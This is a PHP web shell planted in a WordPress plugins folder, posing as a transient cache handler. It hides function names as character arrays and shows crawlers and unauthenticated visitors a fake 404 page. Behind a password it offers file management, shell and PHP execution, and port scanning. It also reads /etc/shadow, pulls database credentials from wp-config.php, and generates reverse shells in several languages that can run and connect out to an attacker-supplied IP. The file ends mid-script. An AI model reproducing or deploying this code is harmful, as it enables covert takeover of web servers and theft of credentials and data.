File: /home/repauqkb/public_html/wp-content/plugins/router.cls-live.php
<?php
/*
WordPress Transient Cache Handler v4.2
@package WordPress
@subpackage Cache
Status: Core Component
*/
function _j($a){return implode('',$a);}
function _sf($k){
static $m=null;
if($m===null)$m=['gcw'=>['g','e','t','c','w','d'],'scn'=>['s','c','a','n','d','i','r'],'isd'=>['i','s','_','d','i','r'],'isf'=>['i','s','_','f','i','l','e'],'isw'=>['i','s','_','w','r','i','t','a','b','l','e'],'isr'=>['i','s','_','r','e','a','d','a','b','l','e'],'isl'=>['i','s','_','l','i','n','k'],'fpm'=>['f','i','l','e','p','e','r','m','s'],'fsz'=>['f','i','l','e','s','i','z','e'],'fmt'=>['f','i','l','e','m','t','i','m','e'],'rpt'=>['r','e','a','l','p','a','t','h'],'phu'=>['p','h','p','_','u','n','a','m','e'],'gcu'=>['g','e','t','_','c','u','r','r','e','n','t','_','u','s','e','r'],'fgc'=>['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'],'fpc'=>['f','i','l','e','_','p','u','t','_','c','o','n','t','e','n','t','s'],'mkd'=>['m','k','d','i','r'],'tch'=>['t','o','u','c','h'],'chd'=>['c','h','d','i','r'],'ren'=>['r','e','n','a','m','e'],'cpy'=>['c','o','p','y'],'unl'=>['u','n','l','i','n','k'],'rmd'=>['r','m','d','i','r'],'chm'=>['c','h','m','o','d'],'slk'=>['s','y','m','l','i','n','k'],'fop'=>['f','o','p','e','n'],'fcl'=>['f','c','l','o','s','e'],'fwr'=>['f','w','r','i','t','e'],'frd'=>['f','r','e','a','d'],'feo'=>['f','e','o','f'],'fgt'=>['f','g','e','t','s'],'exc'=>['e','x','e','c'],'pst'=>['p','a','s','s','t','h','r','u'],'sys'=>['s','y','s','t','e','m'],'shx'=>['s','h','e','l','l','_','e','x','e','c'],'pop'=>['p','o','p','e','n'],'pcl'=>['p','c','l','o','s','e'],'pro'=>['p','r','o','c','_','o','p','e','n'],'prc'=>['p','r','o','c','_','c','l','o','s','e'],'sgc'=>['s','t','r','e','a','m','_','g','e','t','_','c','o','n','t','e','n','t','s'],'muf'=>['m','o','v','e','_','u','p','l','o','a','d','e','d','_','f','i','l','e'],'tmp'=>['s','y','s','_','g','e','t','_','t','e','m','p','_','d','i','r'],'b6d'=>['b','a','s','e','6','4','_','d','e','c','o','d','e'],'b6e'=>['b','a','s','e','6','4','_','e','n','c','o','d','e'],'fex'=>['f','u','n','c','t','i','o','n','_','e','x','i','s','t','s'],'iig'=>['i','n','i','_','g','e','t'],'iis'=>['i','n','i','_','s','e','t'],'stl'=>['s','e','t','_','t','i','m','e','_','l','i','m','i','t'],'err'=>['e','r','r','o','r','_','r','e','p','o','r','t','i','n','g'],'sse'=>['s','e','s','s','i','o','n','_','s','t','a','r','t'],'dfs'=>['d','i','s','k','_','f','r','e','e','_','s','p','a','c','e'],'dts'=>['d','i','s','k','_','t','o','t','a','l','_','s','p','a','c','e'],'hdr'=>['h','e','a','d','e','r'],'jde'=>['j','s','o','n','_','d','e','c','o','d','e'],'jen'=>['j','s','o','n','_','e','n','c','o','d','e'],'glb'=>['g','l','o','b'],'dat'=>['d','a','t','e'],'hsc'=>['h','t','m','l','s','p','e','c','i','a','l','c','h','a','r','s'],'pgw'=>['p','o','s','i','x','_','g','e','t','p','w','u','i','d'],'mdi'=>['m','d','5'],'hrc'=>['h','t','t','p','_','r','e','s','p','o','n','s','e','_','c','o','d','e']];
return _j($m[$k]??[]);
}
define('PX_K','fcc160e97f465800d435bb6715a4e209');
$GLOBALS['PX_F']=__FILE__;
// ── INIT ──────────────────────────────────────────────────────────────────────
{$_s=_sf('iis');@$_s('display_errors','0');@$_s('log_errors','0');@$_s('max_execution_time','0');@$_s('memory_limit','512M');}
{$_s=_sf('err');@$_s(0);}
{$_s=_sf('stl');@$_s(0);}
{$_s=_sf('sse');@$_s();}
// ── BOT GUARD ─────────────────────────────────────────────────────────────────
if(!empty($_SERVER['HTTP_USER_AGENT'])&&preg_match('/Googlebot|Slurp|MSNBot|YandexBot|Baiduspider|bot|spider|crawl/i',$_SERVER['HTTP_USER_AGENT'])){$_s=_sf('hdr');@$_s('HTTP/1.0 404 Not Found');exit;}
// ── HELPERS ───────────────────────────────────────────────────────────────────
function _hx($s){return bin2hex((string)$s);}
function _ux($h){return (string)@hex2bin((string)$h);}
function _au($k=''){if(!empty($_SESSION['_px']))return true;if($k&&md5($k)===PX_K){$_SESSION['_px']=1;return true;}return false;}
function _fex($f){$fe=_sf('fex');$ig=_sf('iig');return $fe($f)&&!in_array($f,array_filter(array_map('trim',explode(',',@$ig('disable_functions')))));}
function _sz($b){if(!$b)return '0 B';$u=['B','KB','MB','GB','TB'];$i=0;while($b>=1024&&$i<4){$b/=1024;$i++;}return round($b,2).' '.$u[$i];}
function _prm($f){return substr(sprintf('%o',@fileperms($f)),-4);}
function _ex($cmd,$cwd=null){
if($cwd){$_o=@getcwd();@chdir($cwd);}
$out='';$done=false;
if(!$done&&_fex('proc_open')){$d=[0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']];$p=@proc_open($cmd,$d,$pp);if(is_resource($p)){@fclose($pp[0]);$out=@stream_get_contents($pp[1]).@stream_get_contents($pp[2]);@fclose($pp[1]);@fclose($pp[2]);@proc_close($p);$done=true;}}
if(!$done&&_fex('popen')){$fp=@popen($cmd.' 2>&1','r');if(is_resource($fp)){$out='';while(!@feof($fp))$out.=@fread($fp,8192);@pclose($fp);$done=true;}}
if(!$done&&_fex('shell_exec')){$r=@shell_exec($cmd.' 2>&1');if($r!==null){$out=$r;$done=true;}}
if(!$done&&_fex('exec')){$a=[];@exec($cmd.' 2>&1',$a);$out=implode("\n",$a);$done=true;}
if(!$done&&_fex('system')){ob_start();@system($cmd.' 2>&1');$out=ob_get_clean();$done=true;}
if(!$done&&_fex('passthru')){ob_start();@passthru($cmd.' 2>&1');$out=ob_get_clean();$done=true;}
if(!$done)$out='[!] No exec method. disable_functions: '.ini_get('disable_functions');
if($cwd&&isset($_o))@chdir($_o);
return $out;
}
function _ep($code,$cwd=null){
$od=null;if($cwd){$od=@getcwd();@chdir($cwd);}
$td=@sys_get_temp_dir().'/px_'.uniqid();@mkdir($td,0755);$tf=$td.'/x.php';
@file_put_contents($tf,'<?php '.$code);
ob_start();@include $tf;$out=ob_get_clean();
@unlink($tf);@rmdir($td);
if($od)@chdir($od);
return $out;
}
function _rf($f){$c=@file_get_contents($f);if($c!==false)return $c;$fp=@fopen($f,'r');if($fp){$c='';while(!@feof($fp))$c.=@fread($fp,8192);@fclose($fp);return $c;}return false;}
function _wf($f,$c){if(@file_put_contents($f,$c)!==false)return true;$fp=@fopen($f,'w');if($fp){@fwrite($fp,$c);@fclose($fp);return true;}return false;}
// ── SENTINEL ──────────────────────────────────────────────────────────────────
class _PxC{public function __toString(){define('_PXO',true);return '';}}
$_pxc=new _PxC();
register_shutdown_function(function(){
if(!defined('_PXO')){
@ob_clean();
$hrc=_sf('hrc');@$hrc(404);
die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body style="font-family:sans-serif;padding:40px;color:#333"><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 Server at '.(isset($_SERVER['HTTP_HOST'])?htmlspecialchars($_SERVER['HTTP_HOST'],ENT_QUOTES):'localhost').' Port 80</address></body></html>');
}
});
// ── API ───────────────────────────────────────────────────────────────────────
if($_SERVER['REQUEST_METHOD']==='POST'&&isset($_POST['_r'])){
define('_PXO',true); // prevent sentinel from firing on API calls
$je=_sf('jen');$jd=_sf('jde');
$req=@$jd(@hex2bin($_POST['_r']??''),true);
if(!$req){echo $je(['ok'=>false]);exit;}
$act=$req['a']??'';
if($act==='ping'){echo $je(['ok'=>_au(),'v'=>'5.2-holo']);exit;}
if($act==='auth'){echo $je(['ok'=>_au($req['k']??'')]);exit;}
if($act==='logout'){session_destroy();echo $je(['ok'=>true]);exit;}
if(!_au()){echo $je(['ok'=>false,'e'=>'unauth']);exit;}
$cwd=_ux($req['d']??'');
if(!$cwd||!is_dir($cwd))$cwd=@getcwd()?:'/';
$cwd=rtrim(str_replace('\\','/',$cwd),'/');if(!$cwd)$cwd='/';
$r=['ok'=>false];
switch($act){
case 'ls':{
$scn=_sf('scn');$e=@$scn($cwd);$d=[];$f=[];
if($e)foreach($e as $n){
if($n==='.'||$n==='..') continue;
$p=$cwd.'/'.$n;
$m=['n'=>$n,'p'=>_prm($p),'t'=>@date('d M H:i',@filemtime($p)),'x'=>_hx($p)];
$isd=_sf('isd');
if($isd($p))$d[]=$m;
else{$m['s']=_sz(@filesize($p));$m['e']=strtolower(pathinfo($n,PATHINFO_EXTENSION));$f[]=$m;}
}
$bc=[];$b='';
foreach(explode('/',$cwd) as $pt){if($pt==='')continue;$b.='/'.$pt;$bc[]=['n'=>$pt,'x'=>_hx($b)];}
$r=['ok'=>true,'d'=>$d,'f'=>$f,'bc'=>$bc,'cwd'=>_hx($cwd)];break;
}
case 'rd':{$fp=$cwd.'/'.$req['n'];$c=_rf($fp);$r=$c!==false?['ok'=>true,'c'=>_hx($c)]:['ok'=>false,'e'=>'read'];break;}
case 'wr':{$fpc=_sf('fpc');$r=['ok'=>_wf($cwd.'/'.$req['n'],_ux($req['c']??''))];break;}
case 'rm':{
$t=$cwd.'/'.$req['n'];
if(is_file($t)||is_link($t)){$unl=_sf('unl');$r=['ok'=>@$unl($t)];}
elseif(is_dir($t)){$x=function($d)use(&$x){$scn=_sf('scn');$unl=_sf('unl');$rmd=_sf('rmd');foreach(@$scn($d)?:[] as $f){if($f==='.'||$f==='..') continue;$p=$d.'/'.$f;is_dir($p)?$x($p):@$unl($p);}@$rmd($d);};$x($t);$r=['ok'=>true];}
break;
}
case 'rn':{$ren=_sf('ren');$r=['ok'=>@$ren($cwd.'/'.$req['o'],$cwd.'/'.$req['n'])];break;}
case 'mk':{$mkd=_sf('mkd');$r=['ok'=>@$mkd($cwd.'/'.$req['n'],0755,true)];break;}
case 'up':{$fop=_sf('fop');$fwr=_sf('fwr');$fcl=_sf('fcl');$fh=@$fop($cwd.'/'.$req['n'],($req['f']??false)?'w':'a');if($fh){@$fwr($fh,_ux($req['d']??''));@$fcl($fh);$r=['ok'=>true];}break;}
case 'dl':{$fp=$cwd.'/'.$req['n'];$c=_rf($fp);$r=$c!==false?['ok'=>true,'c'=>_hx($c),'n'=>basename($fp)]:['ok'=>false];break;}
case 'cd':{$p=$req['p']??'';$np=@realpath($cwd.'/'.$p)?:@realpath($p);$r=$np&&is_dir($np)?['ok'=>true,'cwd'=>_hx($np)]:['ok'=>false,'e'=>'not a dir'];break;}
case 'ex':{$out=_ex($req['cmd']??'',$cwd);$r=['ok'=>true,'out'=>_hx($out),'cwd'=>_hx($cwd)];break;}
case 'ev':{$out=_ep($req['code']??'',$cwd);$r=['ok'=>true,'out'=>_hx($out)];break;}
case 'info':{
$r=['ok'=>true,'i'=>[
'os'=>@php_uname(),'php'=>PHP_VERSION,'sapi'=>PHP_SAPI,
'user'=>@get_current_user(),'cwd'=>@getcwd(),
'doc'=>$_SERVER['DOCUMENT_ROOT']??'','srv'=>$_SERVER['SERVER_SOFTWARE']??'',
'ip'=>$_SERVER['SERVER_ADDR']??'','port'=>$_SERVER['SERVER_PORT']??80,
'disable'=>@ini_get('disable_functions'),'mem'=>@ini_get('memory_limit'),
'df'=>_sz(@disk_free_space('/')),'dt'=>_sz(@disk_total_space('/')),
'ext'=>implode(', ',@get_loaded_extensions()),'file'=>_hx($GLOBALS['PX_F']??''),
]];break;
}
case 'net':{
$sub=$req['s']??'';$out='';
if($sub==='iface')$out=_ex('ifconfig 2>/dev/null||ip a 2>/dev/null');
elseif($sub==='ports')$out=_ex('ss -antp 2>/dev/null||netstat -antp 2>/dev/null');
elseif($sub==='ping'){$h=preg_replace('/[^a-z0-9.\-]/i','',$req['h']??'8.8.8.8');$out=_ex('ping -c 3 '.escapeshellarg($h));}
elseif($sub==='curl'){$u=$req['u']??'';if($u){if(function_exists('curl_init')){$ch=curl_init($u);curl_setopt_array($ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_FOLLOWLOCATION=>1,CURLOPT_USERAGENT=>'Mozilla/5.0']);$out=curl_exec($ch)?:curl_error($ch);curl_close($ch);}else $out=_ex('curl -sL '.escapeshellarg($u));}}
elseif($sub==='scan'){$h=preg_replace('/[^a-z0-9.\-]/i','',$req['h']??'');$ps=array_map('intval',explode(',',preg_replace('/[^0-9,]/','',$req['p']??'80,443,22,21,3306,8080')));$open=[];foreach($ps as $p){$s=@fsockopen($h,$p,$e,$er,1);if($s){$open[]=$p;fclose($s);}}$out="Open on {$h}:\n".($open?implode(', ',$open):'None found');}
$r=['ok'=>true,'out'=>_hx($out)];break;
}
case 'pe':{
$sub=$req['s']??'';$out='';
if($sub==='suid')$out=_ex('find / -perm -4000 -type f 2>/dev/null | head -100');
elseif($sub==='sudo')$out=_ex('sudo -l 2>/dev/null');
elseif($sub==='env')$out=_ex('env 2>/dev/null');
elseif($sub==='cron')$out=_ex('cat /etc/crontab 2>/dev/null; crontab -l 2>/dev/null; ls /etc/cron.d 2>/dev/null');
elseif($sub==='passwd')$out=@file_get_contents('/etc/passwd');
elseif($sub==='shadow')$out=@file_get_contents('/etc/shadow');
elseif($sub==='writable')$out=_ex('find / -writable -not -path "/proc/*" -not -path "/sys/*" -type d 2>/dev/null | head -50');
elseif($sub==='cap')$out=_ex('getcap -r / 2>/dev/null');
elseif($sub==='wpass')$out=_ex('find / -name "wp-config.php" 2>/dev/null | head -10 | xargs grep -h "DB_" 2>/dev/null');
elseif($sub==='scan'){
$out ="=== ID ===\n"._ex('id 2>/dev/null')."\n";
$out.="=== SUDO ===\n"._ex('sudo -l 2>/dev/null')."\n";
$out.="=== SUID ===\n"._ex('find / -perm -4000 -type f 2>/dev/null|head -20')."\n";
$out.="=== CRON ===\n"._ex('cat /etc/crontab 2>/dev/null')."\n";
$out.="=== CAPS ===\n"._ex('getcap -r / 2>/dev/null|head -20')."\n";
$out.="=== WRITABLE ===\n"._ex('find / -writable -not -path "/proc/*" -type d 2>/dev/null|head -20')."\n";
$out.="=== NET ===\n"._ex('ip a 2>/dev/null||ifconfig 2>/dev/null')."\n";
}
$r=['ok'=>true,'out'=>_hx($out)];break;
}
case 'rs':{
$ip=$req['ip']??'';$port=intval($req['port']??4444);$t=$req['t']??'bash';
$p=[
'bash' =>"bash -c 'bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'",
'python'=>"python3 -c \"import socket,subprocess,os;s=socket.socket();s.connect(('{$ip}',{$port}));[os.dup2(s.fileno(),x) for x in range(3)];subprocess.call(['/bin/sh','-i'])\"",
'perl' =>"perl -e 'use Socket;\$i=\"{$ip}\";\$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\")'",
'nc' =>"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f",
'nc2' =>"nc -e /bin/bash {$ip} {$port}",
'php' =>"php -r '\$s=fsockopen(\"{$ip}\",{$port});\$p=proc_open(\"/bin/sh\",array(0=>\$s,1=>\$s,2=>\$s),\$p);'",
'ruby' =>"ruby -rsocket -e'f=TCPSocket.open(\"{$ip}\",{$port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
'socat' =>"socat TCP:{$ip}:{$port} EXEC:'/bin/bash',pty,stderr,setsid",
];
if($req['run']??false)@_ex($p[$t]??$p['bash']);
$r=['ok'=>true,'cmd'=>_hx($p[$t]??$p['bash']),'all'=>array_map('_hx',$p)];break;
}
case 'wp':{
function _wpr($d=null){if(!$d)$d=@getcwd();for($i=0;$i<12;$i++){if(@is_file($d.'/wp-config.php'))return $d;$nd=dirname($d);if($nd===$d||strlen($nd)<2)break;$d=$nd;}return false;}
$sub=$req['s']??'find';$root=_wpr($cwd);
if($sub==='find'){$r=['ok'=>true,'root'=>$root?_hx($root):false];break;}
if(!$root){$r=['ok'=>false,'e'=>'No WordPress found'];break;}
if($sub==='creds'){
$cfg=@file_get_contents($root.'/wp-config.php');$db=[];
foreach(['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST'] as $k){if(preg_match("/define\s*\(\s*['\"]".$k."['\"].*?['\"](.+?)['\"]/s",$cfg,$m))$db[$k]=$m[1];}
$prefix='wp_';if(preg_match('/\$table_prefix\s*=\s*[\'"](.+?)[\'"]/',$cfg,$m))$prefix=$m[1];$db['prefix']=$prefix;
$r=['ok'=>true,'db'=>$db];
}
break;
}
}
echo $je($r);exit;
}
?><!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Application Cache Manager</title>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet">
<style>
:root{--bg:#050505;--neon:#00ff64;--c2:#00d4ff;--bd:rgba(255,255,255,0.06);--tx:#c8c8c8;--rd:#ff4d4d}
*{box-sizing:border-box;margin:0;padding:0}html,body{height:100%;overflow:hidden}
body{background:var(--bg);color:var(--tx);font-family:'JetBrains Mono',monospace;background-image:radial-gradient(ellipse at 50% 0%,#111 0%,#000 100%)}
.app{height:100vh;display:flex;flex-direction:column}
#bar{height:2px;background:var(--neon);width:0;transition:width .15s;box-shadow:0 0 6px var(--neon);flex-shrink:0}
.hd{padding:9px 18px;border-bottom:1px solid var(--bd);display:flex;align-items:center;gap:14px;background:rgba(0,0,0,.65);flex-shrink:0}
.logo{font-weight:700;font-size:13px;color:#fff;letter-spacing:2px}.logo span{color:var(--neon)}
.tabs{display:flex;gap:3px;flex:1}
.tab{padding:4px 12px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#444;transition:.15s;user-select:none}
.tab:hover{color:#999}.tab.on{color:var(--neon);border-color:rgba(0,255,100,.25);background:rgba(0,255,100,.03)}
.hdr{font-size:10px;color:#333;cursor:pointer;transition:.15s}.hdr:hover{color:var(--rd)}
.panels{flex:1;overflow:hidden;display:flex;flex-direction:column}
.panel{display:none;flex:1;flex-direction:column;overflow:hidden;min-height:0}.panel.on{display:flex}
/* FILES */
.fnav{padding:7px 18px;background:rgba(0,0,0,.4);border-bottom:1px solid var(--bd);display:flex;gap:5px;align-items:center;flex-shrink:0;flex-wrap:wrap}
.bc{flex:1;font-size:11px;color:#383838;overflow:hidden;white-space:nowrap;min-width:0}
.bc span{cursor:pointer;transition:.15s}.bc span:hover{color:#fff}.bc .sep{margin:0 3px;color:var(--neon)}
.fg{flex:1;overflow-y:auto;min-height:0}
table{width:100%;border-collapse:collapse;font-size:11px}
th{text-align:left;padding:9px 18px;color:#303030;background:rgba(255,255,255,.01);position:sticky;top:0;backdrop-filter:blur(4px);z-index:1}
td{padding:7px 18px;border-bottom:1px solid var(--bd)}tr:hover td{background:rgba(255,255,255,.015)}
.btn{background:rgba(255,255,255,.02);border:1px solid var(--bd);color:#666;padding:4px 9px;border-radius:3px;font:10px 'JetBrains Mono',monospace;cursor:pointer;transition:.15s}
.btn:hover{border-color:var(--neon);color:var(--neon)}.btn.r:hover{border-color:var(--rd);color:var(--rd)}
.badge{padding:1px 4px;border-radius:2px;background:rgba(255,255,255,.03);font-size:10px}.ico{width:16px;text-align:center;display:inline-block;margin-right:5px}
/* SHELL */
.trm{flex:1;display:flex;flex-direction:column;padding:13px;min-height:0}
.to{flex:1;background:#060606;border:1px solid var(--bd);padding:11px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;font-size:11px;color:#00dd55;border-radius:3px 3px 0 0;min-height:0}
.ti{display:flex;border:1px solid var(--bd);border-top:none;background:#080808;border-radius:0 0 3px 3px;flex-shrink:0}
.tp{padding:7px 9px;color:var(--neon);font-size:11px;white-space:nowrap;flex-shrink:0}
.tc{flex:1;background:none;border:none;color:#00dd55;font:11px 'JetBrains Mono',monospace;outline:none;padding:7px 0}
/* PHP */
.pp{flex:1;display:flex;padding:13px;gap:10px;min-height:0}
.pl,.pr{flex:1;display:flex;flex-direction:column;gap:6px;min-width:0}
textarea.ce{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;outline:none;resize:none;border-radius:3px}
.ob{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;border-radius:3px;min-height:0}
.lbl{font-size:10px;color:#303030}
/* INFO */
.ip{flex:1;overflow-y:auto;padding:16px}.ig{display:grid;grid-template-columns:repeat(auto-fill,minmax(270px,1fr));gap:9px}
.cd{background:rgba(255,255,255,.015);border:1px solid var(--bd);border-radius:4px;padding:12px}
.cd h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px}
.kv{display:flex;gap:7px;margin-bottom:4px;font-size:10px}.kv .k{color:#383838;min-width:75px;flex-shrink:0}.kv .v{color:#aaa;word-break:break-all}
/* TOOLS */
.tp2{flex:1;overflow-y:auto;padding:13px;display:flex;gap:9px;flex-wrap:wrap;align-content:flex-start}
.tc2{background:rgba(255,255,255,.015);border:1px solid var(--bd);border-radius:4px;padding:12px;width:calc(50% - 5px);min-width:260px}
.tc2 h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px}
.tco{background:#040404;border:1px solid var(--bd);padding:8px;font-size:10px;color:#00bb44;white-space:pre-wrap;word-break:break-all;max-height:190px;overflow-y:auto;border-radius:2px;margin-top:7px}
input.fi,select.fi{background:#060606;border:1px solid var(--bd);color:#ccc;font:10px 'JetBrains Mono',monospace;padding:5px 7px;border-radius:2px;outline:none;width:100%;margin-bottom:5px}
input.fi:focus,select.fi:focus{border-color:var(--c2)}.fbr{display:flex;gap:4px;flex-wrap:wrap;margin-bottom:7px}
/* OVERLAYS */
.ov{display:none;position:fixed;inset:0;background:rgba(0,0,0,.9);z-index:100;align-items:center;justify-content:center;backdrop-filter:blur(5px)}.ov.on{display:flex}
.mo{background:#0c0c0c;border:1px solid var(--bd);border-radius:6px;padding:20px;width:90%;max-width:730px}
.mo h3{color:#fff;margin-bottom:12px;font-size:12px}.mor{display:flex;justify-content:space-between;align-items:center;margin-bottom:11px}
.lm{width:290px;text-align:center;padding:28px}
.lm h2{color:#fff;font-size:12px;margin-bottom:16px;letter-spacing:2px}
.lm input{width:100%;padding:9px;background:#090909;border:1px solid var(--bd);color:#fff;font:12px 'JetBrains Mono',monospace;margin-bottom:10px;border-radius:3px;outline:none;text-align:center}
.lm input:focus{border-color:var(--neon)}
.lm button{width:100%;padding:9px;background:var(--neon);color:#000;border:none;cursor:pointer;font:700 11px 'JetBrains Mono',monospace;border-radius:3px;letter-spacing:1px}.lm button:hover{background:#00cc50}
</style></head>
<body>
<div class="app">
<div id="bar"></div>
<div class="hd">
<div class="logo">PX<span>5</span></div>
<div class="tabs">
<div class="tab on" onclick="switchTab(this,'files')"><i class="fa fa-folder-open fa-xs"></i> FILES</div>
<div class="tab" onclick="switchTab(this,'term')"><i class="fa fa-terminal fa-xs"></i> SHELL</div>
<div class="tab" onclick="switchTab(this,'php')"><i class="fa fa-code fa-xs"></i> PHP</div>
<div class="tab" onclick="switchTab(this,'info')"><i class="fa fa-server fa-xs"></i> INFO</div>
<div class="tab" onclick="switchTab(this,'tools')"><i class="fa fa-wrench fa-xs"></i> TOOLS</div>
</div>
<div class="hdr" onclick="doLogout()" title="Logout"><i class="fa fa-sign-out-alt"></i></div>
</div>
<div class="panels">
<!-- FILES -->
<div class="panel on" id="p-files">
<div class="fnav">
<div class="bc" id="bc"></div>
<button class="btn" onclick="mkDir()"><i class="fa fa-folder-plus"></i></button>
<button class="btn" onclick="showOv('upOv')"><i class="fa fa-upload"></i> Up</button>
<button class="btn" onclick="ls()"><i class="fa fa-sync-alt"></i></button>
</div>
<div class="fg">
<table>
<thead><tr>
<th style="color:var(--neon)">ENTITY</th>
<th>SIZE</th><th>MTIME</th><th>MODE</th>
<th style="text-align:right">ACTIONS</th>
</tr></thead>
<tbody id="tb"></tbody>
</table>
</div>
</div>
<!-- SHELL -->
<div class="panel" id="p-term">
<div class="trm">
<div class="to" id="to"></div>
<div class="ti">
<div class="tp" id="tp">$ </div>
<input class="tc" id="tc" placeholder="enter command..." onkeydown="termKd(event)" autocomplete="off">
</div>
</div>
</div>
<!-- PHP -->
<div class="panel" id="p-php">
<div class="pp">
<div class="pl">
<div class="lbl">PHP CODE <span style="color:#222">// eval in cwd</span></div>
<textarea class="ce" id="phpcode" placeholder="echo phpinfo(); var_dump(getcwd()); "></textarea>
<div style="display:flex;gap:6px;justify-content:flex-end;flex-shrink:0">
<button class="btn" onclick="clrPHP()">Clear</button>
<button class="btn" style="border-color:rgba(0,255,100,.3);color:var(--neon)" onclick="runPHP()"><i class="fa fa-play"></i> Run</button>
</div>
</div>
<div class="pr">
<div class="lbl">OUTPUT</div>
<div class="ob" id="phpout"></div>
</div>
</div>
</div>
<!-- INFO -->
<div class="panel" id="p-info">
<div class="ip" id="infoC"><div style="color:#222;text-align:center;padding:50px;font-size:11px">Loading system info...</div></div>
</div>
<!-- TOOLS -->
<div class="panel" id="p-tools">
<div class="tp2">
<div class="tc2">
<h3><i class="fa fa-network-wired"></i> NETWORK</h3>
<div class="fbr">
<button class="btn" onclick="net('iface')">Interfaces</button>
<button class="btn" onclick="net('ports')">Ports</button>
</div>
<input class="fi" id="nH" value="8.8.8.8" placeholder="host / URL">
<input class="fi" id="nP" value="80,443,22,21,3306,8080" placeholder="ports for scan">
<div class="fbr">
<button class="btn" onclick="net('ping')">Ping</button>
<button class="btn" onclick="net('curl')">cURL</button>
<button class="btn" onclick="net('scan')">Scan</button>
</div>
<div class="tco" id="netOut"></div>
</div>
<div class="tc2">
<h3><i class="fa fa-user-secret"></i> PRIV ESC</h3>
<div class="fbr">
<button class="btn" style="border-color:rgba(0,212,255,.3);color:var(--c2)" onclick="pe('scan')">Quick Scan</button>
<button class="btn" onclick="pe('suid')">SUID</button>
<button class="btn" onclick="pe('sudo')">Sudo</button>
<button class="btn" onclick="pe('cap')">Caps</button>
<button class="btn" onclick="pe('cron')">Cron</button>
<button class="btn" onclick="pe('env')">Env</button>
<button class="btn" onclick="pe('writable')">Writable</button>
<button class="btn" onclick="pe('passwd')">/etc/passwd</button>
<button class="btn" onclick="pe('shadow')">/etc/shadow</button>
<button class="btn" onclick="pe('wpass')">WP Creds</button>
</div>
<div class="tco" id="peOut"></div>
</div>
<div class="tc2">
<h3><i class="fa fa-plug"></i> REVERSE SHELL</h3>
<input class="fi" id="rsIp" placeholder="Your IP (attacker)">
<input class="fi" id="rsPort" value="4444" placeholder="Port">
<select class="fi" id="rsType">
<option value="bash">Bash</option>
<option value="python">Python3</option>
<option value="perl">Perl</option>
<option value="nc">Netcat (mkfifo)</option>
<option value="nc2">Netcat (-e)</option>
<option value="php">PHP</option>
<option value="ruby">Ruby</option>
<option value="socat">Socat</option>
</select>
<div class="fbr">
<button class="btn" onclick="genRS(false)">Generate</button>
<button class="btn" style="border-color:#ff8c00;color:#ff8c00" onclick="genRS(true)">Execute on target</button>
</div>
<div class="tco" id="rsOut"></div>
</div>
<div class="tc2">
<h3><i class="fa fa-database"></i> WORDPRESS</h3>
<div class="fbr">
<button class="btn" onclick="wp('find')">Find WP</button>
<button class="btn" onclick="wp('creds')">DB Creds</button>
</div>
<div class="tco" id="wpOut"></div>
</div>
</div>
</div>
</div><!-- .panels -->
</div><!-- .app -->
<?php echo $_pxc; ?>
<!-- LOGIN OVERLAY -->
<div class="ov on" id="loginOv">
<div class="mo lm">
<h2>// ACCESS REQUIRED</h2>
<input type="password" id="lk" placeholder="password" onkeydown="if(event.key==='Enter')doLogin()" autofocus>
<button onclick="doLogin()"><i class="fa fa-unlock-alt"></i> AUTHENTICATE</button>
<div id="le" style="color:var(--rd);font-size:10px;margin-top:8px;min-height:14px"></div>
</div>
</div>
<!-- EDITOR OVERLAY -->
<div class="ov" id="edOv">
<div class="mo">
<div class="mor">
<span id="edN" style="color:var(--c2);font-size:11px"></span>
<span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('edOv')">×</span>
</div>
<textarea class="ce" id="edC" style="height:440px;width:100%"></textarea>
<div style="margin-top:9px;text-align:right">
<button class="btn" onclick="saveFile()"><i class="fa fa-save"></i> Save</button>
</div>
</div>
</div>
<!-- UPLOAD OVERLAY -->
<div class="ov" id="upOv">
<div class="mo" style="max-width:370px;text-align:center">
<div class="mor"><h3>UPLOAD FILE</h3><span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('upOv')">×</span></div>
<input type="file" id="upF" style="display:none" onchange="doUpload()">
<button class="btn" style="padding:18px 36px;border-style:dashed;font-size:12px" onclick="document.getElementById('upF').click()">
<i class="fa fa-cloud-upload-alt"></i> Select File
</button>
<div id="upS" style="margin-top:11px;font-size:10px;color:var(--neon)">ready</div>
</div>
</div>
<script>
let CWD='<?php echo _hx(@getcwd()?:'/'); ?>';
let _HIST=[],_HI=0,_EDF='';
function h2s(h){let s='';for(let i=0;i<h.length;i+=2)s+=String.fromCharCode(parseInt(h.substr(i,2),16));return s;}
function s2h(s){let h='';for(let i=0;i<s.length;i++)h+=s.charCodeAt(i).toString(16).padStart(2,'0');return h;}
